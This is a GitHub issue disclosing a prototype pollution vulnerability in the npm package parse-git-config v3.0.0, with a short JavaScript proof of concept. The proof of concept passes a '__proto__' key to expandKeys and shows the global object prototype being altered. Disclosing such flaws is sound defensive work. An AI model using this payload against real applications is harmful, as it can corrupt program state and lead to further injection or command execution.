- Sponsor
-
Notifications
You must be signed in to change notification settings - Fork 11
Open
Description
Affected Package:
parse-git-config v3.0.0
Vulnerability Location(s):
https://github.com/jonschlinkert/parse-git-config/blob/master/index.js#L134
Description:
The latest version of parse-git-config (3.0.0) is vulnerable to Prototype Pollution through the entry function expandKeys. An attacker can supply a payload with a prop
and m[2]
to introduce or modify properties within the global prototype chain.
The consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library is integrated within the application. For example, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.
PoC:
(async () => {
var victim = {};
const parseGitConfig = require('parse-git-config');
console.log("Before Attack: ", {}.isPolluted); // undefined
let config = {
'__proto__ "isPolluted"': true
};
parseGitConfig.expandKeys(config);
console.log("After Attack: ", {}.isPolluted); // true
})();
terrymun, Thomas0c, CorentinLeGuen, Sarkisov0205, artem-beresnev-gyg and 6 more
Metadata
Metadata
Assignees
Labels
No labels
Projects
Milestone
Relationships
Development
Select code repository
Activity
[-]Prototype Pollution Vulneralbility in xregexp v3.0.0[/-][+]Prototype Pollution Vulneralbility in parse-git-config v3.0.0[/+]thomashohn commentedon Mar 17, 2025
@jonschlinkert any chance that this issue could be fixed og @Ducky97 could you provide a PR for a fix?